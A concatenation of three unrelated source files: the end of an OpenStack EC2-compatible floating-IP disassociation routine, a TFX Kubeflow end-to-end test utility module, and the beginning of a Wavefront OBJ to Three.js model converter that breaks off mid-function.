            # disassociated by association id, not by public IP.
            if address and _is_address_valid(context, neutron, address):
                msg = _('You must specify an association id when '
                        'unmapping an address from a VPC instance')
                raise exception.InvalidParameterValue(msg)
            # NOTE(tikitavi): check the public IP exists to raise AWS
            # exception otherwise
            os_floating_ip = self.get_os_floating_ip_by_public_ip(
                context, public_ip)
            os_ports = self.get_os_ports(context)
            os_instance_id = _get_os_instance_id(context, os_floating_ip,
                                                 os_ports)
            if os_instance_id:
                nova = clients.nova(context)
                nova.servers.remove_floating_ip(os_instance_id, public_ip)
            return None
        if not address:
            msg = _("The address '%(public_ip)s' does not belong to you.")
            raise exception.AuthFailure(msg % {'public_ip': public_ip})
        if 'network_interface_id' not in address:
            msg = _('You must specify an association id when unmapping '
                    'an address from a VPC instance')
            raise exception.InvalidParameterValue(msg)
        # Translate the public-IP lookup into the equivalent association id
        # so the common VPC path below can be shared.
        association_id = ec2utils.change_ec2_id_kind(address['id'],
                                                     'eipassoc')
    address = db_api.get_item_by_id(
        context, ec2utils.change_ec2_id_kind(association_id, 'eipalloc'))
    if address is None or not _is_address_valid(context, neutron, address):
        raise exception.InvalidAssociationIDNotFound(
            id=association_id)
    if 'network_interface_id' in address:
        # Clear the DB association first; the cleaner re-associates it if the
        # subsequent Neutron update crashes, keeping DB and Neutron in sync.
        with common.OnCrashCleaner() as cleaner:
            network_interface_id = address['network_interface_id']
            private_ip_address = address['private_ip_address']
            _disassociate_address_item(context, address)
            cleaner.addCleanup(_associate_address_item, context, address,
                               network_interface_id, private_ip_address)
            neutron.update_floatingip(address['os_id'],
                                      {'floatingip': {'port_id': None}})
def get_os_floating_ips(self, context):
    """Return the project's floating IPs as reported by Neutron."""
    neutron = clients.neutron(context)
    response = neutron.list_floatingips(tenant_id=context.project_id)
    return response['floatingips']
def get_os_ports(self, context):
    """Return the project's ports as reported by Neutron."""
    response = clients.neutron(context).list_ports(
        tenant_id=context.project_id)
    return response['ports']
def get_os_floating_ip_by_public_ip(self, context, public_ip):
    """Find the OpenStack floating IP matching a public address.

    Raises AuthFailure (AWS semantics) when no floating IP of the
    project has the requested address.
    """
    for candidate in self.get_os_floating_ips(context):
        if candidate['floating_ip_address'] == public_ip:
            return candidate
    msg = _("The address '%(public_ip)s' does not belong to you.")
    raise exception.AuthFailure(msg % {'public_ip': public_ip})
address_engine = get_address_engine()
| |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utility for testing Kubeflow-based orchestrator."""
import datetime
import json
import os
import re
import subprocess
import tarfile
import time
from typing import Any, Dict, List, Optional
from absl import logging
import kfp
from kfp_server_api import rest
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import InfraValidator
from tfx.components import Pusher
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components import Transform
from tfx.dsl.component.experimental import executor_specs
from tfx.dsl.components.base.base_component import BaseComponent
from tfx.dsl.components.common import resolver
from tfx.dsl.input_resolution.strategies import latest_artifact_strategy
from tfx.dsl.io import fileio
from tfx.dsl.placeholder import placeholder as ph
from tfx.orchestration import pipeline as tfx_pipeline
from tfx.orchestration import test_utils
from tfx.orchestration.kubeflow import kubeflow_dag_runner
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.proto import infra_validator_pb2
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types import channel_utils
from tfx.types import component_spec
from tfx.types import standard_artifacts
from tfx.types.standard_artifacts import Model
from tfx.utils import docker_utils
from tfx.utils import io_utils
from tfx.utils import kube_utils
from tfx.utils import retry
from tfx.utils import test_case_utils
# TODO(jiyongjung): Merge with kube_utils.PodStatus
# Various execution status of a KFP pipeline.
KFP_RUNNING_STATUS = 'running'
KFP_SUCCESS_STATUS = 'succeeded'
KFP_FAIL_STATUS = 'failed'
KFP_SKIPPED_STATUS = 'skipped'
KFP_ERROR_STATUS = 'error'
# Statuses that mean the run has terminated (successfully or not);
# poll_kfp_with_retry() stops polling when one of these is observed.
KFP_FINAL_STATUS = frozenset(
    (KFP_SUCCESS_STATUS, KFP_FAIL_STATUS, KFP_SKIPPED_STATUS, KFP_ERROR_STATUS))
def poll_kfp_with_retry(host: str, run_id: str, retry_limit: int,
                        timeout: datetime.timedelta,
                        polling_interval: int) -> str:
  """Gets the pipeline execution status by polling KFP at the specified host.

  Args:
    host: address of the KFP deployment.
    run_id: id of the execution of the pipeline.
    retry_limit: number of consecutive polling failures tolerated before an
      error is raised.
    timeout: timeout of this long-running operation, in timedelta.
    polling_interval: interval between two consecutive polls, in seconds.

  Returns:
    The final status of the execution. Possible value can be found at
    https://github.com/kubeflow/pipelines/blob/master/backend/api/run.proto#L254

  Raises:
    RuntimeError: if polling failed for retry_limit times consecutively, or
      if the overall deadline passed before a final status was observed.
  """
  start_time = datetime.datetime.now()
  retry_count = 0
  while True:
    # TODO(jxzheng): workaround for 1hr timeout limit in kfp.Client().
    # This should be changed after
    # https://github.com/kubeflow/pipelines/issues/3630 is fixed.
    # Currently gcloud authentication token has a 1-hour expiration by default
    # but kfp.Client() does not have a refreshing mechanism in place. This
    # causes failure when attempting to get running status for a long pipeline
    # execution (> 1 hour).
    # Instead of implementing a whole authentication refreshing mechanism
    # here, we chose re-creating kfp.Client() frequently to make sure the
    # authentication does not expire. This is based on the fact that
    # kfp.Client() is very light-weight.
    # See more details at
    # https://github.com/kubeflow/pipelines/issues/3630
    client = kfp.Client(host=host)
    # TODO(b/156784019): workaround the known issue at b/156784019 and
    # https://github.com/kubeflow/pipelines/issues/3669
    # by wait-and-retry when ApiException is hit.
    try:
      get_run_response = client.get_run(run_id=run_id)
    except rest.ApiException as api_err:
      # If get_run failed with ApiException, wait _POLLING_INTERVAL and retry.
      if retry_count < retry_limit:
        retry_count += 1
        logging.info('API error %s was hit. Retrying: %s / %s.', api_err,
                     retry_count, retry_limit)
        time.sleep(polling_interval)
        continue
      raise RuntimeError('Still hit remote error after %s retries: %s' %
                         (retry_limit, api_err))
    else:
      # If get_run succeeded, reset retry_count.
      retry_count = 0
    if (get_run_response and get_run_response.run and
        get_run_response.run.status and
        get_run_response.run.status.lower() in KFP_FINAL_STATUS):
      # Return because final status is reached.
      return get_run_response.run.status
    if datetime.datetime.now() - start_time > timeout:
      # Timeout.
      raise RuntimeError('Waiting for run timeout at %s' %
                         datetime.datetime.now().strftime('%H:%M:%S'))
    logging.info('Waiting for the job to complete...')
    time.sleep(polling_interval)
def print_failure_log_for_run(host: str, run_id: str, namespace: str):
  """Prints logs of failed components of a run.

  Prints execution logs for failed components using `logging.info`.
  This resembles the behavior of `argo logs` but uses K8s API directly.
  Don't print anything if the run was successful.

  Args:
    host: address of the KFP deployment.
    run_id: id of the execution of the pipeline.
    namespace: namespace of K8s cluster.
  """
  client = kfp.Client(host=host)
  run = client.get_run(run_id=run_id)
  workflow_manifest = json.loads(run.pipeline_runtime.workflow_manifest)
  # Nothing to report when the overall workflow did not fail.
  if kube_utils.PodPhase(
      workflow_manifest['status']['phase']) != kube_utils.PodPhase.FAILED:
    return
  k8s_client = kube_utils.make_core_v1_api()
  # Keep only workflow nodes of type 'Pod'.
  pods = [i for i in workflow_manifest['status']['nodes'] if i['type'] == 'Pod']
  for pod in pods:
    if kube_utils.PodPhase(pod['phase']) != kube_utils.PodPhase.FAILED:
      continue
    display_name = pod['displayName']
    pod_id = pod['id']
    # Logs are read from the 'main' container of each failed pod.
    log = k8s_client.read_namespaced_pod_log(
        pod_id, namespace=namespace, container='main')
    for line in log.splitlines():
      logging.info('%s:%s', display_name, line)
# Custom component definitions for testing purpose.
class _HelloWorldSpec(component_spec.ComponentSpec):
  """Spec for the producer test component: one String output, one parameter."""
  INPUTS = {}
  OUTPUTS = {
      'greeting':
          component_spec.ChannelParameter(type=standard_artifacts.String)
  }
  PARAMETERS = {
      'word': component_spec.ExecutionParameter(type=str),
  }
class _ByeWorldSpec(component_spec.ComponentSpec):
  """Spec for the consumer test component: one String input, no outputs."""
  INPUTS = {
      'hearing': component_spec.ChannelParameter(type=standard_artifacts.String)
  }
  OUTPUTS = {}
  PARAMETERS = {}
class HelloWorldComponent(BaseComponent):
  """Producer component."""
  SPEC_CLASS = _HelloWorldSpec
  # Container-based executor: echoes "hello <word>" and pipes it via gsutil
  # to the URI of the 'greeting' output artifact.
  EXECUTOR_SPEC = executor_specs.TemplatedExecutorContainerSpec(
      # TODO(b/143965964): move the image to private repo if the test is flaky
      # due to docker hub.
      image='gcr.io/google.com/cloudsdktool/cloud-sdk:latest',
      command=['sh', '-c'],
      args=[
          'echo "hello ' +
          ph.exec_property('word') +
          '" | gsutil cp - ' +
          ph.output('greeting')[0].uri
      ])

  def __init__(self, word, greeting=None):
    """Args:
      word: value of the 'word' execution parameter to greet with.
      greeting: optional output channel; a fresh String channel is created
        when omitted.
    """
    if not greeting:
      artifact = standard_artifacts.String()
      greeting = channel_utils.as_channel([artifact])
    super().__init__(_HelloWorldSpec(word=word, greeting=greeting))
class ByeWorldComponent(BaseComponent):
  """Consumer component."""
  SPEC_CLASS = _ByeWorldSpec
  # Container-based executor: echoes the value of the 'hearing' input.
  EXECUTOR_SPEC = executor_specs.TemplatedExecutorContainerSpec(
      image='bash:latest',
      command=['echo'],
      args=['received ' + ph.input('hearing')[0].value])

  def __init__(self, hearing):
    """Args:
      hearing: input String channel to consume.
    """
    super().__init__(_ByeWorldSpec(hearing=hearing))
def create_primitive_type_components(pipeline_name: str) -> List[BaseComponent]:
  """Creates components for testing primitive type artifact passing.

  Wires the HelloWorld producer into the ByeWorld consumer so that a
  primitive String artifact travels between the two.

  Args:
    pipeline_name: Name of this pipeline.

  Returns:
    A list of TFX custom container components.
  """
  producer = HelloWorldComponent(word=pipeline_name)
  consumer = ByeWorldComponent(hearing=producer.outputs['greeting'])
  return [producer, consumer]
def create_e2e_components(
    pipeline_root: str,
    csv_input_location: str,
    transform_module: str,
    trainer_module: str,
) -> List[BaseComponent]:
  """Creates components for a simple Chicago Taxi TFX pipeline for testing.

  Args:
    pipeline_root: The root of the pipeline output.
    csv_input_location: The location of the input data directory.
    transform_module: The location of the transform module file.
    trainer_module: The location of the trainer module file.

  Returns:
    A list of TFX components that constitutes an end-to-end test pipeline.
  """
  example_gen = CsvExampleGen(input_base=csv_input_location)
  statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
  schema_gen = SchemaGen(statistics=statistics_gen.outputs['statistics'])
  example_validator = ExampleValidator(
      statistics=statistics_gen.outputs['statistics'],
      schema=schema_gen.outputs['schema'])
  transform = Transform(
      examples=example_gen.outputs['examples'],
      schema=schema_gen.outputs['schema'],
      module_file=transform_module)
  # Resolver that picks the most recent previously-trained model, used as the
  # warm-start base model for the Trainer below.
  latest_model_resolver = resolver.Resolver(
      strategy_class=latest_artifact_strategy.LatestArtifactStrategy,
      latest_model=Channel(type=Model)).with_id('latest_model_resolver')
  trainer = Trainer(
      transformed_examples=transform.outputs['transformed_examples'],
      schema=schema_gen.outputs['schema'],
      base_model=latest_model_resolver.outputs['latest_model'],
      transform_graph=transform.outputs['transform_graph'],
      train_args=trainer_pb2.TrainArgs(num_steps=10),
      eval_args=trainer_pb2.EvalArgs(num_steps=5),
      module_file=trainer_module,
  )
  # Set the TFMA config for Model Evaluation and Validation.
  eval_config = tfma.EvalConfig(
      model_specs=[tfma.ModelSpec(signature_name='eval')],
      metrics_specs=[
          tfma.MetricsSpec(
              metrics=[tfma.MetricConfig(class_name='ExampleCount')],
              thresholds={
                  'accuracy':
                      tfma.MetricThreshold(
                          value_threshold=tfma.GenericValueThreshold(
                              lower_bound={'value': 0.5}),
                          change_threshold=tfma.GenericChangeThreshold(
                              direction=tfma.MetricDirection.HIGHER_IS_BETTER,
                              absolute={'value': -1e-10}))
              })
      ],
      slicing_specs=[
          tfma.SlicingSpec(),
          tfma.SlicingSpec(feature_keys=['trip_start_hour'])
      ])
  evaluator = Evaluator(
      examples=example_gen.outputs['examples'],
      model=trainer.outputs['model'],
      eval_config=eval_config)
  # Smoke-tests that the model can actually be served (TF Serving on K8s).
  infra_validator = InfraValidator(
      model=trainer.outputs['model'],
      examples=example_gen.outputs['examples'],
      serving_spec=infra_validator_pb2.ServingSpec(
          tensorflow_serving=infra_validator_pb2.TensorFlowServing(
              tags=['latest']),
          kubernetes=infra_validator_pb2.KubernetesConfig()),
      request_spec=infra_validator_pb2.RequestSpec(
          tensorflow_serving=infra_validator_pb2.TensorFlowServingRequestSpec())
  )
  pusher = Pusher(
      model=trainer.outputs['model'],
      model_blessing=evaluator.outputs['blessing'],
      push_destination=pusher_pb2.PushDestination(
          filesystem=pusher_pb2.PushDestination.Filesystem(
              base_directory=os.path.join(pipeline_root, 'model_serving'))))
  return [
      example_gen,
      statistics_gen,
      schema_gen,
      example_validator,
      transform,
      latest_model_resolver,
      trainer,
      evaluator,
      infra_validator,
      pusher,
  ]
@retry.retry(ignore_eventual_failure=True)
def delete_ai_platform_model(model_name):
  """Delete pushed model with the given name in AI Platform."""
  # AI Platform refuses to delete a model that still has versions, so all
  # versions are enumerated and removed first.
  list_result = subprocess.run(  # pylint: disable=subprocess-run-check
      ('gcloud', 'ai-platform', 'versions', 'list',
       '--model={}'.format(model_name), '--region=global'),
      stdout=subprocess.PIPE)
  # The return code is inspected explicitly below, so check_output() is not
  # needed; a non-zero code simply means there are no versions to clean up.
  if list_result.returncode == 0:
    logging.info('Model %s has versions %s', model_name, list_result.stdout)
    # The first stdout line contains headers ([NAME] [DEPLOYMENT_URI] [STATE])
    # and is skipped. By specification of the test case, the last version in
    # the output list is the default version, which is deleted last by this
    # loop, so there is no special handling needed here.
    # The operation setting default version is at
    # https://github.com/tensorflow/tfx/blob/65633c772f6446189e8be7c6332d32ea221ff836/tfx/extensions/google_cloud_ai_platform/runner.py#L309
    version_rows = list_result.stdout.decode('utf-8').strip('\n').split('\n')
    for row in version_rows[1:]:
      version_name = row.split()[0]
      logging.info('Deleting version %s of model %s', version_name, model_name)
      subprocess.run(
          ('gcloud', '--quiet', 'ai-platform', 'versions', 'delete',
           version_name, '--model={}'.format(model_name), '--region=global'),
          check=True)
  logging.info('Deleting model %s', model_name)
  subprocess.run(('gcloud', '--quiet', 'ai-platform', 'models', 'delete',
                  model_name, '--region=global'),
                 check=True)
class BaseKubeflowTest(test_case_utils.TfxTest):
  """Base class that defines testing harness for pipeline on KubeflowRunner."""

  # Seconds to sleep between two consecutive Argo status polls.
  _POLLING_INTERVAL_IN_SECONDS = 10

  # The following environment variables need to be set prior to calling the test
  # in this file. All variables are required and do not have a default.
  # The base container image name to use when building the image used in tests.
  _BASE_CONTAINER_IMAGE = os.environ['KFP_E2E_BASE_CONTAINER_IMAGE']
  # The src path to use to build docker image
  _REPO_BASE = os.environ['KFP_E2E_SRC']
  # The project id to use to run tests.
  _GCP_PROJECT_ID = os.environ['KFP_E2E_GCP_PROJECT_ID']
  # The GCP region in which the end-to-end test is run.
  _GCP_REGION = os.environ['KFP_E2E_GCP_REGION']
  # The GCP bucket to use to write output artifacts.
  _BUCKET_NAME = os.environ['KFP_E2E_BUCKET_NAME']
  # The location of test data. The input files are copied to a test-local
  # location for each invocation, and cleaned up at the end of test.
  _TEST_DATA_ROOT = os.environ['KFP_E2E_TEST_DATA_ROOT']
  # The location of test user module. Will be packaged and copied to under the
  # pipeline root before pipeline execution.
  _MODULE_ROOT = os.path.join(
      os.path.dirname(os.path.dirname(os.path.dirname(__file__))),
      'components/testdata/module_file')

  @classmethod
  def setUpClass(cls):
    """Builds (or reuses) the container image shared by all test pipelines."""
    super(BaseKubeflowTest, cls).setUpClass()
    if ':' not in cls._BASE_CONTAINER_IMAGE:
      # Generate base container image for the test if tag is not specified.
      cls.container_image = '{}:{}'.format(cls._BASE_CONTAINER_IMAGE,
                                           test_utils.random_id())
      # Create a container image for use by test pipelines.
      test_utils.build_and_push_docker_image(cls.container_image,
                                             cls._REPO_BASE)
    else:  # Use the given image as a base image.
      cls.container_image = cls._BASE_CONTAINER_IMAGE

  @classmethod
  def tearDownClass(cls):
    """Removes the container image if one was built by setUpClass."""
    super(BaseKubeflowTest, cls).tearDownClass()
    if cls.container_image != cls._BASE_CONTAINER_IMAGE:
      # Delete container image used in tests.
      logging.info('Deleting image %s', cls.container_image)
      docker_utils.delete_image(cls.container_image)

  def setUp(self):
    """Copies test data to a per-test GCS location and registers cleanup."""
    super().setUp()
    self._test_dir = self.tmp_dir
    self.enter_context(test_case_utils.change_working_dir(self.tmp_dir))
    self._test_output_dir = 'gs://{}/test_output'.format(self._BUCKET_NAME)
    test_id = test_utils.random_id()
    self._testdata_root = 'gs://{}/test_data/{}'.format(self._BUCKET_NAME,
                                                        test_id)
    io_utils.copy_dir(self._TEST_DATA_ROOT, self._testdata_root)
    self._data_root = os.path.join(self._testdata_root, 'external', 'csv')
    self._transform_module = os.path.join(self._MODULE_ROOT,
                                          'transform_module.py')
    self._trainer_module = os.path.join(self._MODULE_ROOT, 'trainer_module.py')
    self._serving_model_dir = os.path.join(self._testdata_root, 'output')
    self.addCleanup(self._delete_test_dir, test_id)

  @retry.retry(ignore_eventual_failure=True)
  def _delete_test_dir(self, test_id: str):
    """Deletes files for this test including the module file and data files."""
    logging.info('Deleting test data: %s', self._testdata_root)
    io_utils.delete_dir(self._testdata_root)

  @retry.retry(ignore_eventual_failure=True)
  def _delete_workflow(self, workflow_name: str):
    """Deletes the specified Argo workflow."""
    logging.info('Deleting workflow %s', workflow_name)
    subprocess.run(['argo', '--namespace', 'kubeflow', 'delete', workflow_name],
                   check=True)

  def _run_workflow(self,
                    workflow_file: str,
                    workflow_name: str,
                    parameter: Optional[Dict[str, str]] = None):
    """Runs the specified workflow with Argo.

    Blocks until the workflow has run (successfully or not) to completion.

    Args:
      workflow_file: YAML file with Argo workflow spec for the pipeline.
      workflow_name: Name to use for the workflow.
      parameter: mapping from pipeline parameter name to its runtime value.
    """

    # TODO(ajaygopinathan): Consider using KFP cli instead.
    def _format_parameter(parameter: Dict[str, Any]) -> List[str]:
      """Format the pipeline parameter section of argo workflow."""
      if parameter:
        result = []
        for k, v in parameter.items():
          result.append('-p')
          result.append('{}={}'.format(k, v))
        return result
      else:
        return []

    run_command = [
        'argo',
        'submit',
        '--name',
        workflow_name,
        '--namespace',
        'kubeflow',
        '--serviceaccount',
        'pipeline-runner',
        workflow_file,
    ]
    run_command += _format_parameter(parameter)
    logging.info('Launching workflow %s with parameter %s', workflow_name,
                 _format_parameter(parameter))
    with test_utils.Timer('RunningPipelineToCompletion'):
      subprocess.run(run_command, check=True)
      # Wait in the loop while pipeline is pending or running state.
      status = 'Pending'
      while status in ('Pending', 'Running'):
        time.sleep(self._POLLING_INTERVAL_IN_SECONDS)
        status = self._get_argo_pipeline_status(workflow_name)

  @retry.retry(ignore_eventual_failure=True)
  def _delete_pipeline_output(self, pipeline_name: str):
    """Deletes output produced by the named pipeline."""
    io_utils.delete_dir(self._pipeline_root(pipeline_name))

  def _pipeline_root(self, pipeline_name: str) -> str:
    """Returns the output root directory for the named pipeline."""
    return os.path.join(self._test_output_dir, pipeline_name)

  def _create_pipeline(self, pipeline_name: str,
                       components: List[BaseComponent],
                       beam_pipeline_args: Optional[List[str]] = None):
    """Creates a pipeline given name and list of components."""
    return tfx_pipeline.Pipeline(
        pipeline_name=pipeline_name,
        pipeline_root=self._pipeline_root(pipeline_name),
        components=components,
        enable_cache=True,
        beam_pipeline_args=beam_pipeline_args,
    )

  def _create_dataflow_pipeline(self,
                                pipeline_name: str,
                                components: List[BaseComponent],
                                wait_until_finish_ms: int = 1000 * 60 * 20):
    """Creates a pipeline with Beam DataflowRunner."""
    beam_pipeline_args = [
        '--runner=TestDataflowRunner',
        '--wait_until_finish_duration=%d' % wait_until_finish_ms,
        '--project=' + self._GCP_PROJECT_ID,
        '--temp_location=' +
        os.path.join(self._pipeline_root(pipeline_name), 'tmp'),
        '--region=' + self._GCP_REGION,
        # TODO(b/171733562): Remove `use_runner_v2` once it is the default for
        # Dataflow.
        '--experiments=use_runner_v2',
    ]
    return self._create_pipeline(
        pipeline_name, components, beam_pipeline_args=beam_pipeline_args)

  def _get_kubeflow_metadata_config(
      self) -> kubeflow_pb2.KubeflowMetadataConfig:
    """Returns the default Kubeflow metadata config for test pipelines."""
    config = kubeflow_dag_runner.get_default_kubeflow_metadata_config()
    return config

  def _get_argo_pipeline_status(self, workflow_name: str) -> str:
    """Get Pipeline status.

    Args:
      workflow_name: The name of the workflow.

    Returns:
      Simple status string which is returned from `argo get` command.
    """
    get_workflow_command = [
        'argo', '--namespace', 'kubeflow', 'get', workflow_name
    ]
    output = subprocess.check_output(get_workflow_command).decode('utf-8')
    logging.info('Argo output ----\n%s', output)
    # 'argo get' prints a 'Status: <value>' line; extract the value.
    match = re.search(r'^Status:\s+(.+)$', output, flags=re.MULTILINE)
    self.assertIsNotNone(match)
    return match.group(1)

  def _compile_and_run_pipeline(self,
                                pipeline: tfx_pipeline.Pipeline,
                                workflow_name: Optional[str] = None,
                                parameters: Optional[Dict[str, Any]] = None):
    """Compiles and runs a KFP pipeline.

    Args:
      pipeline: The logical pipeline to run.
      workflow_name: The argo workflow name, default to pipeline name.
      parameters: Value of runtime parameters of the pipeline.
    """
    pipeline_name = pipeline.pipeline_info.pipeline_name
    config = kubeflow_dag_runner.KubeflowDagRunnerConfig(
        kubeflow_metadata_config=self._get_kubeflow_metadata_config(),
        tfx_image=self.container_image)
    kubeflow_dag_runner.KubeflowDagRunner(config=config).run(pipeline)
    # The runner emits <pipeline_name>.tar.gz containing pipeline.yaml.
    file_path = os.path.join(self._test_dir, '{}.tar.gz'.format(pipeline_name))
    self.assertTrue(fileio.exists(file_path))
    tarfile.TarFile.open(file_path).extract('pipeline.yaml')
    pipeline_file = os.path.join(self._test_dir, 'pipeline.yaml')
    self.assertIsNotNone(pipeline_file)
    workflow_name = workflow_name or pipeline_name
    # Ensure cleanup regardless of whether pipeline succeeds or fails.
    self.addCleanup(self._delete_workflow, workflow_name)
    self.addCleanup(self._delete_pipeline_output, pipeline_name)
    # Run the pipeline to completion.
    self._run_workflow(pipeline_file, workflow_name, parameters)
    # Obtain workflow logs.
    get_logs_command = [
        'argo', '--namespace', 'kubeflow', 'logs', '-w', workflow_name
    ]
    logs_output = subprocess.check_output(get_logs_command).decode('utf-8')
    # Check if pipeline completed successfully.
    status = self._get_argo_pipeline_status(workflow_name)
    self.assertEqual(
        'Succeeded', status, 'Pipeline {} failed to complete successfully: {}'
        '\nFailed workflow logs:\n{}'.format(pipeline_name, status,
                                             logs_output))
| |
"""Convert Wavefront OBJ / MTL files into Three.js (JSON model version, to be used with ascii / binary loader)
-------------------------
How to use this converter
-------------------------
python convert_obj_three.py -i infile.obj -o outfile.js [-m "morphfiles*.obj"] [-c "morphcolors*.obj"] [-a center|centerxz|top|bottom|none] [-s smooth|flat] [-t ascii|binary] [-d invert|normal] [-b] [-e]
Notes:
- flags
-i infile.obj input OBJ file
-o outfile.js output JS file
-m "morphfiles*.obj" morph OBJ files (can use wildcards, enclosed in quotes; multiple patterns separated by spaces)
-c "morphcolors*.obj" morph colors OBJ files (can use wildcards, enclosed in quotes; multiple patterns separated by spaces)
-a center|centerxz|top|bottom|none model alignment
-s smooth|flat smooth = export vertex normals, flat = no normals (face normals computed in loader)
-t ascii|binary export ascii or binary format (ascii has more features, binary just supports vertices, faces, normals, uvs and materials)
-d invert|normal invert transparency
-b bake material colors into face colors
-x 10.0 scale and truncate
-f 2 morph frame sampling step
- by default:
use smooth shading (if there were vertex normals in the original model)
will be in ASCII format
original model is assumed to use non-inverted transparency / dissolve (0.0 fully transparent, 1.0 fully opaque)
no face colors baking
no scale and truncate
morph frame step = 1 (all files will be processed)
- binary conversion will create two files:
outfile.js (materials)
outfile.bin (binary buffers)
--------------------------------------------------
How to use generated JS file in your HTML document
--------------------------------------------------
<script type="text/javascript" src="Three.js"></script>
...
<script type="text/javascript">
...
// load ascii model
var jsonLoader = new THREE.JSONLoader();
jsonLoader.load( "Model_ascii.js", function( geometry ) { createScene( geometry ) } );
// load binary model
var binLoader = new THREE.BinaryLoader();
binLoader.load( "Model_bin.js", function( geometry ) { createScene( geometry) } );
function createScene( geometry ) {
var mesh = new THREE.Mesh( geometry, new THREE.MeshFaceMaterial() );
}
...
</script>
-------------------------------------
Parsers based on formats descriptions
-------------------------------------
http://en.wikipedia.org/wiki/Obj
http://en.wikipedia.org/wiki/Material_Template_Library
-------------------
Current limitations
-------------------
- for the moment, only diffuse color and texture are used
(will need to extend shaders / renderers / materials in Three)
- texture coordinates can be wrong in canvas renderer
(there is crude normalization, but it doesn't
work for all cases)
- smoothing can be turned on/off only for the whole mesh
----------------------------------------------
How to get proper OBJ + MTL files with Blender
----------------------------------------------
0. Remove default cube (press DEL and ENTER)
1. Import / create model
2. Select all meshes (Select -> Select All by Type -> Mesh)
3. Export to OBJ (File -> Export -> Wavefront .obj)
- enable following options in exporter
Material Groups
Rotate X90
Apply Modifiers
High Quality Normals
Copy Images
Selection Only
Objects as OBJ Objects
UVs
Normals
Materials
- select empty folder
- give your exported file name with "obj" extension
- click on "Export OBJ" button
4. Your model is now all files in this folder (OBJ, MTL, number of images)
- this converter assumes all files staying in the same folder,
(OBJ / MTL files use relative paths)
- for WebGL, textures must be power of 2 sized
------
Author
------
AlteredQualia http://alteredqualia.com
"""
import fileinput
import operator
import random
import os.path
import getopt
import sys
import struct
import math
import glob
# #####################################################
# Configuration
# #####################################################
# Defaults for the command-line options (see module docstring for flags).
ALIGN = "none" # center centerxz bottom top none
SHADING = "smooth" # smooth flat
TYPE = "ascii" # ascii binary
TRANSPARENCY = "normal" # normal invert
TRUNCATE = False # truncate coordinates to integers after scaling (-x)
SCALE = 1.0 # coordinate scale factor (-x)
FRAMESTEP = 1 # morph frame sampling step (-f)
BAKE_COLORS = False # bake material colors into face colors (-b)
# default colors for debugging (each material gets one distinct color):
# white, red, green, blue, yellow, cyan, magenta
COLORS = [0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee, 0xeeee00, 0x00eeee, 0xee00ee]
# #####################################################
# Templates
# #####################################################
# %-substitution templates for the generated Three.js JSON output. The
# binary variant stores geometry in a separate .bin file named by "buffers".
TEMPLATE_FILE_ASCII = u"""\
{
"metadata" :
{
"formatVersion" : 3,
"sourceFile" : "%(fname)s",
"generatedBy" : "OBJConverter",
"vertices" : %(nvertex)d,
"faces" : %(nface)d,
"normals" : %(nnormal)d,
"colors" : %(ncolor)d,
"uvs" : %(nuv)d,
"materials" : %(nmaterial)d
},
"scale" : %(scale)f,
"materials": [%(materials)s],
"vertices": [%(vertices)s],
"morphTargets": [%(morphTargets)s],
"morphColors": [%(morphColors)s],
"normals": [%(normals)s],
"colors": [%(colors)s],
"uvs": [[%(uvs)s]],
"faces": [%(faces)s]
}
"""
TEMPLATE_FILE_BIN = u"""\
{
"metadata" :
{
"formatVersion" : 3,
"sourceFile" : "%(fname)s",
"generatedBy" : "OBJConverter",
"vertices" : %(nvertex)d,
"faces" : %(nface)d,
"normals" : %(nnormal)d,
"uvs" : %(nuv)d,
"materials" : %(nmaterial)d
},
"materials": [%(materials)s],
"buffers": "%(buffers)s"
}
"""
# Per-element formatting templates (vertex positions, normals, UVs, colors).
TEMPLATE_VERTEX = "%f,%f,%f"
TEMPLATE_VERTEX_TRUNCATE = "%d,%d,%d"
TEMPLATE_N = "%.5g,%.5g,%.5g"
TEMPLATE_UV = "%.5g,%.5g"
TEMPLATE_COLOR = "%.3g,%.3g,%.3g"
TEMPLATE_COLOR_DEC = "%d"
TEMPLATE_MORPH_VERTICES = '\t{ "name": "%s", "vertices": [%s] }'
TEMPLATE_MORPH_COLORS = '\t{ "name": "%s", "colors": [%s] }'
# #####################################################
# Utils
# #####################################################
def file_exists(filename):
    """Return true if file exists and is accessible for reading.

    Should be safer than just testing for existence due to links and
    permissions magic on Unix filesystems.

    @rtype: boolean
    """
    try:
        # Use a context manager so the probe handle is always closed,
        # even if an error occurs between open() and close().
        with open(filename, 'r'):
            return True
    except IOError:
        return False
def get_name(fname):
    """Create model name based on filename ("path/fname.js" -> "fname")."""
    base = os.path.basename(fname)
    return os.path.splitext(base)[0]
def bbox(vertices):
    """Compute axis-aligned bounding box of a vertex array.

    Each vertex is an [x, y, z] sequence. Returns a dict of
    {'x': [min, max], 'y': [min, max], 'z': [min, max]}; all-zero
    ranges for an empty input.
    """
    if not vertices:
        return { 'x':[0,0], 'y':[0,0], 'z':[0,0] }
    # One pass per axis with the built-in min/max instead of a manual
    # compare-and-update scan; the result is identical.
    xs = [v[0] for v in vertices]
    ys = [v[1] for v in vertices]
    zs = [v[2] for v in vertices]
    return { 'x':[min(xs), max(xs)],
             'y':[min(ys), max(ys)],
             'z':[min(zs), max(zs)] }
def translate(vertices, t):
    """Translate array of vertices in place by vector t.

    Mutates each [x, y, z] vertex; returns None.
    """
    # Iterate the vertex lists directly instead of Python-2-only xrange()
    # index arithmetic; behavior is identical and works on Python 2 and 3.
    for vertex in vertices:
        vertex[0] += t[0]
        vertex[1] += t[1]
        vertex[2] += t[2]
def center(vertices):
    """Center model (middle of bounding box)."""
    box = bbox(vertices)
    # Midpoint of each axis range, using the same a + (b - a)/2 form.
